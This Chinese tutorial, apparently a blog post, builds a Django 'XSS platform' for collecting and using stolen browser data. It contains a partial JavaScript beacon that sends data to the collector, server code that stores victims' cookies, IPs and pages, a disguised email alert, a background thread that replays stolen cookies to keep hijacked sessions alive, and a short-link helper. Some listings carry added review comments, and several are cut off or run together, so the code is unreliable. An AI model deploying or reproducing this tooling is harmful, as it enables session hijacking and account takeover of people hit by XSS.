1) 简要描述
原理十分简单2333,代码呆萌,大牛勿喷 >_<
2) 基础知识
- XSS攻击基本原理和利用方法
- Django框架的使用
3) Let's start
0x01
工欲善其事必先利其器,首先我们需要准备编写代码的各种工具和环境,这里不细说。我这里的环境和工具如下:
- python 3.7.0
- pycharm
- windows 10
- mysql 8.0.15
- Django 2.1.3
需要用到的第三方库:
- django
- pymysql
- requests
0x02
我们先看一下XSS脚本是如何工作的
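# (page fragment: JavaScript listing, cut off by extraction)
# var website = "http://127.0.0.1"; (function() { (new Image()).src = website + '/"htmlcode">

# ---- listing: the module the next listing imports as `.getscript` ----
"""Return the JavaScript code that matches a given url value."""
import os

import pymysql

from user.safeio import re_check


def get_info(url):
    """Look up the script name stored for ``url`` in the ``projects`` table.

    Returns ``'default'`` when ``url`` fails the ``num_letter`` check, when
    no project row matches, or when the stored name is NULL.
    """
    if not re_check(url, 'num_letter'):
        return 'default'
    # NOTE(review): database credentials (root/root) are hard-coded here;
    # a dedicated low-privilege account read from configuration is safer.
    db = pymysql.connect('localhost', 'root', 'root', 'xss')
    try:
        cursor = db.cursor()
        # Bound parameter instead of string concatenation, so the query does
        # not depend on re_check() being the only barrier.
        cursor.execute("Select name From projects Where url=%s", (url,))
        row = cursor.fetchone()
    finally:
        # The original never closed this connection.
        db.close()
    # fetchone() returns None when nothing matches; the original indexed it
    # unconditionally and raised TypeError in that case.
    if row is None or row[0] is None:
        return 'default'
    return row[0]


def get_js_value(url):
    """Read the script file selected by ``get_info(url)`` and return its text
    with the ``<-1234->`` marker replaced by ``url``.
    """
    js_name = get_info(url)
    # NOTE(review): js_name comes from the database and is joined into a file
    # path; confirm project names are restricted so the path cannot leave the
    # script directory.
    relative_path = '\\script\\' + js_name + '.js'
    with open(os.getcwd() + relative_path) as handle:
        js_value = handle.read()
    # NOTE(review): when re_check() rejects url, get_info() falls back to
    # 'default' but the unchecked url is still substituted into the script
    # text below; verify the caller validates url before this point.
    return js_value.replace('<-1234->', url)


# ---- listing: storage of incoming records (file name not shown on the page) ----
import time

import pymysql

from .getscript import get_info


def connect():
    """Open a connection to the ``xss`` database and return ``(db, cursor)``.

    Retries a bounded number of times and re-raises the last pymysql error.
    The original recursed inside a bare ``except`` without returning the
    result of the retry, so a successful retry still handed ``None`` to the
    caller and a permanent outage ended in unbounded recursion.
    """
    attempts = 3
    last_error = None
    for _ in range(attempts):
        try:
            db = pymysql.connect('localhost', 'root', 'root', 'xss')
            return db, db.cursor()
        except pymysql.MySQLError as exc:
            last_error = exc
            print('连接数据库失败,正在尝试重新连接')
    raise last_error


def put_letter(requests, url):
    """Collect fields from the incoming Django request and store them.

    Every value read here (headers, query parameters, method) is supplied by
    the remote client and must be treated as untrusted wherever it is later
    stored, queried or displayed.
    """
    now_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))[2:]
    meta = requests.META
    if 'HTTP_X_FORWARDED_FOR' in meta:
        # X-Forwarded-For is a client-supplied header; unless a trusted
        # reverse proxy overwrites it, the stored address can be forged.
        ip = meta['HTTP_X_FORWARDED_FOR']
    else:
        ip = meta.get('REMOTE_ADDR', '0.0.0.0')
    # The original called .replace("'", "\'") on each value. In Python "\'"
    # is the same one-character string as "'", so that call changed nothing
    # and gave no protection; put_mysql() now binds the values as parameters.
    origin = requests.GET.get('location', 'Unknown')
    software = meta.get('HTTP_USER_AGENT', 'Unknown')
    method = requests.method
    data = requests.GET.get('cookie', 'No data')
    keep_alive = requests.GET.get('keepsession', '0')
    fields = [now_time, ip, origin, software, method, data, keep_alive]
    put_mysql(fields, url)


def put_mysql(list, url):
    """Insert one record into ``letters`` for the project identified by ``url``.

    ``list`` holds, in order: time, ip, origin, software, method, data,
    keep_alive. Nothing is written when no project row matches ``url``.
    """
    record = list  # parameter name kept for callers; it shadows the builtin
    db, cursor = connect()
    try:
        name = get_info(url)
        # url reaches this query even when re_check() rejected it inside
        # get_info(), so it must be bound, never concatenated.
        cursor.execute("Select user From projects Where url=%s", (url,))
        row = cursor.fetchone()
        if row is None:
            return
        cursor.execute(
            "INSERT INTO letters(time,name,ip,origin,software,method,data,user,keep_alive) "
            "VALUES(%s,%s,%s,%s,%s,%s,%s,%s,%s)",
            (record[0], name, record[1], record[2], record[3], record[4],
             record[5], row[0], record[6]),
        )
        db.commit()
    finally:
        db.close()


def get_letters(username):
    """Return all rows of ``letters`` whose ``user`` column equals ``username``."""
    db, cursor = connect()
    try:
        cursor.execute("SELECT * FROM letters WHERE user = %s", (username,))
        return cursor.fetchall()
    finally:
        db.close()

# 既然我们知道了xss脚本会将信息构造通过GET的参数形式传给XSS平台,我们只需在服务器接受数据并保存即可。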
0x04
我们可以为我们的平台编写新的功能以完善我们的平台,如邮件提醒,cookie活性保持等
#coding=utf-8
'''
Send e-mail
'''
import smtplib
from email.mime.text import MIMEText
from email.utils import formataddr

# NOTE(review): account name and password live in source as placeholders;
# real values belong in configuration kept out of version control.
my_sender='xxxx'
my_pass = 'xxxx'


def send_mail(user_mail):
    '''
    Send a fixed plain-text notification to user_mail through smtp.qq.com
    over SSL (port 465), logging in as my_sender.

    Any Exception raised along the way is swallowed, so the caller cannot
    tell whether the message was sent.
    '''
    try:
        print(user_mail)
        msg=MIMEText('您点的外卖已送达,请登录平台查询','plain','utf-8')
        msg['From']=formataddr(["XSS平台",my_sender])
        msg['To']=formataddr(["顾客",user_mail])
        msg['Subject']="您点的外卖已送达,请登录平台查询"
        server=smtplib.SMTP_SSL("smtp.qq.com", 465)
        server.login(my_sender, my_pass)
        server.sendmail(my_sender,[user_mail,],msg.as_string())
        # quit() is only reached on success; if login or sendmail raises,
        # the connection is left for the garbage collector.
        server.quit()
    except Exception:
        # NOTE(review): failures (bad credentials, refused recipient,
        # network errors) are discarded without a log entry.
        pass


# ---- listing: the module imported elsewhere on the page as xssplatform.keep_alive ----
'''
Use a thread separate from the main thread to keep the cookie information
of the common project "alive". Kept alive for one hour by default.
'''
import requests,queue,time,pymysql

Cookie_Time = 1


def decrease(time,number):
    '''
    Return time as a string, prefixed with '0' when it is less than number.

    The parameter name shadows the time module inside this function.
    '''
    if time < number:
        time = '0'+str(time)
    else:
        time = str(time)
    return time


def count_time(now_time):
    '''
    Take a timestamp string laid out as 'YY-MM-DD HH:MM:SS' and return an
    earlier timestamp in the same layout; minutes and seconds are copied
    through unchanged.

    NOTE(review): the nesting below is reconstructed from a listing that was
    collapsed onto one line; confirm it against the original file.
    NOTE(review): the arithmetic moves the hour back by 5, not by the one
    hour the module docstring mentions, and only hour 0 takes the
    previous-day branch (Cookie_Time is 1), so hours 1-4 produce a negative
    hour field. The month/year rollover also leaves day at 1 when the month
    is 1 and assumes 30-day months otherwise.
    '''
    global Cookie_Time
    # Fixed-width slices of the 'YY-MM-DD HH:MM:SS' string.
    year = int(now_time[0:2])
    month = int(now_time[3:5])
    day = int(now_time[6:8])
    hours = int(now_time[9:11])
    if hours < Cookie_Time:
        if day == 1:
            if month == 1:
                month=12
                year -= 1
            else:
                day=30
                month -= 1
        else:
            day -= 1
        hours += 19
    else:
        hours -= 5
    # Zero-pad each field back to two characters.
    hours = decrease(hours,10)
    day = decrease(day,10)
    month = decrease(month,10)
    year = decrease(year,10)
    dec_time = ("{0}-{1}-{2} {3}").format(year,month,day,hours) + now_time[11:]
    return dec_time


def create_queue():
    '''
    Select software, origin and data from the letters rows whose name is
    'default', whose keep_alive is '1' and whose time is later than
    count_time(now), and return them in a queue.Queue.
    '''
    Cookie_queue = queue.Queue()
    now_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))[2:]
    dec_time = count_time(now_time)
    # dec_time is computed locally rather than taken from a request, but the
    # query is still assembled with str.format; a bound parameter would keep
    # it consistent with safe query construction.
    m_query = ("SELECT software,origin,data FROM letters WHERE name='default' and time>'{}' and keep_alive = '1'").format(dec_time)
    # NOTE(review): hard-coded root/root credentials, and this connection is
    # never closed; one is opened on every call.
    db = pymysql.connect('127.0.0.1','root','root','xss')
    cursor = db.cursor()
    cursor.execute(m_query)
    return_list = cursor.fetchall()
    for x in return_list:
        Cookie_queue.put(x)
    return Cookie_queue


def action():
    '''
    Loop forever: sleep 60 seconds, rebuild the queue, then issue one GET
    per queued row to the stored origin URL, sending the stored User-Agent
    and Cookie values as headers.

    NOTE(review): origin, software and data were taken verbatim from request
    parameters and headers by the storage listing on this page, so this
    server sends requests to URLs, and with header values, that any remote
    client can choose (a server-side request forgery exposure for the host
    running it). The call also has no timeout.
    NOTE(review): for the application that owns the session, this traffic
    would presumably appear as the same session cookie arriving from a
    second client address at roughly one-minute intervals; HttpOnly cookies
    and binding sessions to client attributes are the usual countermeasures.
    '''
    while True:
        time.sleep(60)
        task_queue = create_queue()
        while not task_queue.empty():
            tasks = task_queue.get()
            # Row layout follows the SELECT order: software, origin, data.
            url = tasks[1]
            ua = tasks[0]
            cookie = tasks[2]
            headers = {'User-Agent': ua, 'Cookie': cookie}
            try:
                requests.get(url, headers=headers)
            except:
                # Bare except: every error, including interpreter-exit
                # signals raised as exceptions, is silently dropped.
                pass

# 注意这里需要使用独立于django主线程的子线程,比如我在manager.py里添加了这么一段代码:
import threading

from xssplatform.keep_alive import action


class keep_Thread(threading.Thread):
    """Thread whose body is a single call to action() from xssplatform.keep_alive."""

    def __init__(self):
        # No extra state; only the base Thread initialisation is needed.
        super().__init__()

    def run(self):
        """Hand control to action() on this thread."""
        action()


if __name__ == '__main__':
    # The thread is not marked as a daemon, so the process stays alive for
    # as long as run() keeps executing.
    th = keep_Thread()
    th.start()

# 短链接:
''' 短链接生成 接口c7.gg ''' import requests,json Headers = { "accept" : "application/json, text/javascript, */*; q=0.01", "accept-encoding" : "gzip, deflate, br", "accept-language" : "zh-CN,zh;q=0.9,en;q=0.8", "content-length" : "53", "content-type" : "application/x-www-form-urlencoded; charset=UTF-8", "origin" : "https://www.985.so", "referer" : "https://www.985.so/", "user-agent" : "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36", } def url_to_short(url): global Headers data = {'type':'c7','url':url} r = requests.post('https://create.ft12.com/done.php"_blank" href="https://github.com/HackerYunen/django-xss-platform">Github ,有任何问题可以提交issue,我会在第一时间进行回复。
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持。